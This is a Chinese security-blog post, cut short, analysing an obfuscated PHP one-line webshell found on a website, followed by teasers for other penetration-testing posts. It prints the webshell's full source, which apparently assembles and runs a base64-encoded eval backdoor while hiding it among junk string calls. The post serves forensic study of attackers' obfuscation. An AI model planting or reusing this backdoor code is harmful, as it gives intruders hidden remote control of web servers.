【技术讨论】对某加密一句话shell的解密

对某加密一句话shell的解密
antian365.comsimeon
   由于攻防技术对抗的发展,硬件防火墙+软件Waf+杀毒软件的防护已经使得普通webshell在渗透过程中生存周期越来越短;在实际项目渗透测试过程中,可能会遇到前人渗透过留下的webshell,这些webshell大多数是进行过加密处理的,这个时候就需要对webshell进行分析,获取以下一些信息:
1)文件md5校验,收集webshellmd5值。一般来讲webshell加密完成后一般不会对其内容进行更改,因此其文件内容md5值相对固定。
2)对源代码进行解密,获取其加密密码,加密密码如果不是普通的密码,可以用来分析密码习惯,利用社工库来追踪黑客轨迹。
3)源代码关键字收集,在webshell源代码中有可能会留下QQ独特信息。
   本文对收集到的一款webshell(一句话后门)进行代码解密及分析,学习它人加密思路和长处,在后续过程可以复用,同时本文还对一些常见的加密变换函数进行了分析和介绍。
1.1源代码
在网站目录下获取的一句话后门文件,通过查看其源代码,发现其中基本是一堆乱码,根据经验判断应该是一句话后面经过变异以后的代码,其完整源代码如下:
<?php
$xN =$xN.substr("iyb42str_relgP804",5,6);
$lvcg =str_split("muk9aw28wltcq",6);
$xN =$xN.substr("l9cdplacepArBE9dk",4,5);
$jl =stripos("epxwkl7f66tfkt","jl");
$t = $t.substr("tQGV2YWwJcVu4",1,6);
$eia7 =trim("j8l2wml46reen");
$b =$b.substr("kbase64kBDt9L6nm",1,6);
$ig =trim("b39w0gnuli");
$y =$y.$xN("rY","","crYrerYa");
$yu1 =str_split("bi1b87m8a0o6x",2);
$t =$t.$xN("xA6x","","wxA6xoJF9");
$nd =stripos("n65t88rxn02edj3f0","nd");
$b =$b.$xN("wI39","","_wI39dwI39ec");
$h8ps =str_split("kn9j9h4mhwgf3fjip",3);
$y =$y.substr("hyte_funwViSVE4J",2,6);
$yf7 =strlen("uehu49g6tg5ko");
$t =$t.$xN("fp","","QfpTfp1Nfp");
$m9 =strlen("eul604cobk");
$b = $b.substr("l0W1odelA1eSnEJ",4,3);
$h0bw =trim("n3e5h0cqtokvgob8tx");
$y =$y.$xN("yb","","cybtio");
$s7a =rtrim("auebyc9g4t5d8k");
$t =$t.substr("bMs0nBh83UWyd",9,4);
$d59q =stripos("cjvuckoy5wf3otea","d59q");
$y =$y.substr("nD9HxQSL8ngR",9,1);
$l1 = str_split("agqq09gbqn1",4);
$t =$t.$xN("w6o4","","wcDw6o4Yw6o40");
$py =stripos("lgy8htrrv1tc3","py");
$t =$t.$xN("eP32","","bXFeP32h");
$xp3d =stripos("ukl0nbnx9gt3","xp3d");
$t =$t.substr("ikJ00HJMngxc",7,5);
$dt2b =strlen("e4a5abuajw3vlcira");
$t =$t.substr("cdN1Kxem53NwmEh86BS",7,4);
$ubj =strlen("wghjnft2op5kx1c086t");
$t =$t.substr("m4aoxdujgnXSkcxL4FWcYd",7,6);
$qx =strlen("rlqfkkftro8gfko7ya");
$t =$t.substr("r7y",1,1);
$mu =rtrim("ngdxwux5vqe1");
$j =$y("", $b($t));
$bnlp =strlen("vufy0ak1fyav");
$sdh =str_split("wmnjvg3c7p0m",4);
$mb =ltrim("n52p1pgaepeokf");
$e0pw =rtrim("uu4mhgp5c9pna4egq");
$ugh =trim("rcpd3o9w99tio9");
$grck =strlen("x5rix5bp1xky7");
$eo6t =strlen("ddi1h14ecuyuc7d");$j();
$dvnq = str_split("prm6giha1vro3604au",8);
$ug8 =rtrim("ec8w52supb4vu8eo");
$rct =stripos("hxe6wo7ewd8me7dt","rct");
$ekqf =str_split("prf5y08e8flffw025j8",8);
$vyr =str_split("umpjcsrfg6h5nd6o45",9);
$wrf =rtrim("fyx99o7938h7ugqh");
$q14 =strlen("tc46osxl1st1ic2");
functiono( ){   };
$usf =strlen("fltcpxb7tfbjsmt");
?>
1.2源代码中用到的函数
   对代码中的函数进行统计和去重,主要使用函数有:
  1substr函数:substr(string,start,length),返回字符串的一部分,参数信息如下:
string 必需,规定要返回其中一部分的字符串。
start          必需,规定在字符串的何处开始;正数值则在字符串的指定位置开始,负数则从字符串结尾开始的指定位置开始;0值则在字符串中的第一个字符处开始。
length可选,规定被返回字符串的长度,默认是直到字符串的结尾。正数值是从 start 参数所在的位置返回的长度,负数值从字符串末端返回的长度。使用一段代码来解释其具体应用,效果如图1所示。

[align=center][font=宋体][/font][attachment=5673][align=left]

re2c和bison直接就可以分析规则了

技术交流QQ群: 397745473
来自:https://xianzhi.aliyun.com/forum/read/1647.html?fpage=3

评论

发表评论

此博客中的热门博文

【漏洞研究】[渗透测试]滲透Facebook的思路與發現

图片
原文:http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script/ 寫在故事之前 身為一位滲透測試人員,比起 Client Side 的弱點我更喜歡 Server Side 的攻擊,能夠直接的控制伺服器、獲得權限操作 SHELL 才爽 <( ̄︶ ̄)> 當然一次完美的滲透任何形式的弱點都不可小覷,在實際滲透時偶爾還是需要些 Client Side 弱點組合可以更完美的控制伺服器,但是在尋找弱點時我本身還是先偏向以可直接進入伺服器的方式來去尋找風險高、能長驅直入的弱點。 隨著 Facebook 在世界上越來越火紅、用戶量越來越多,一直以來都有想要嘗試看看的想法,恰巧 Facebook 在 2012 年開始有了 Bug Bounty 獎金獵人的機制讓我更躍躍欲試。 一般如由滲透的角度來說習慣性都會從收集資料、偵查開始,首先界定出目標在網路上的 "範圍" 有多大,姑且可以評估一下從何處比較有機會下手。例如: Google Hacking 到什麼資料? 用了幾個 B 段的 IP ? C 段的 IP ? Whois? Reverse Whois? 用了什麼域名? 內部使用的域名? 接著做子域名的猜測、掃描 公司平常愛用什麼樣技術、設備? 在 Github, Pastebin 上是否有洩漏什麼資訊? …etc 當然 Bug Bounty 並不是讓你無限制的攻擊,將所蒐集到的範圍與 Bug Bounty 所允許的範圍做交集後才是你真正可以去嘗試的目標。 一般來說大公司在滲透中比較容易出現的問題點這裡舉幾個例子來探討 對多數大公司而言," 網路邊界 " 是比較難顧及、容易出現問題的一塊,當公司規模越大,同時擁有數千、數萬台機器在線,網管很難顧及到每台機器。在攻防裡,防守要防的是一個面,但攻擊只需找個一個點就可以突破,所以防守方相對處於弱勢,攻擊者只要找到一台位於網路邊界的機器入侵進去就可以開始在內網進行滲透了! 對於 " 連網設備 " 的安全意識相對薄弱,由於連網設備通常不會提供 SHELL 給管理員做進一步的操作,只能由設備本身所提供的介...
阅读全文

【技术讨论】使用apache mod_rewrite方法随机提供payloads

图片
本文中讲述的方法更适用于真实渗透测试环境中,因为电子邮件钓鱼往往是威胁到整个公司,而不是只威胁到红队的测试环境。因为电子邮件钓鱼具有高针对性,并且手动设置攻击载荷对攻击来说也是很麻烦的。所以请阅读这篇文章,我会通过设置一个apache重定向器或者直接设置一个服务器,通过RewrieMap从预定义的攻击payload列表中随机选取payload进行提供。 apache中RewriteMap方法允许外部的程序比如脚本,数据库,文本文件等映射到服务器内部。在官方文档中使用最多的例子:如果一家网店的url结构想从item-1234到iphone-7-white,那么网站管理员无需更改任何硬编码的代码,只需当访问item-1234时,apache来提供iphone-7-white这一url。RewriteMap提供了大量修改这些资源的方法。我们会使用RewriteMap从一个文本文档中提取的payload转换为URI,并且当被访问时,进行302跳转,使目标能够访问到我们随机的payload文件。 下图就是攻击的主要内容: 环境配置 apache环境需要更改一些设置以便服务器环境支持mod_rewrite以及RewriteMap方法。这些设置的详细信息都在我之前的 一篇文章 中写过。长话短说,打开位于/etc/apache2/的apache2.conf文件,通过增加以下代码重写htaccess文件: <Directory /var/www/>         Options Indexes FollowSymLinks         AllowOverride None         Require all granted </Directory> 如果你的重定向器的网站根目录不是默认的/var/www,你需要去更改一下AllowOverride的响应目录。 在配置服务器的文档中,我们需要在底部添加: RewriteMap payloads "rnd:/var/www/payloads.txt" 这一行代码就告诉mod_rewrite方法,当我们使用RewriteMap调用payload变量时,就会从/var/www/payloads.txt提取。apache用户必须具有读取这一文件的权限。并且应该储存在w...
阅读全文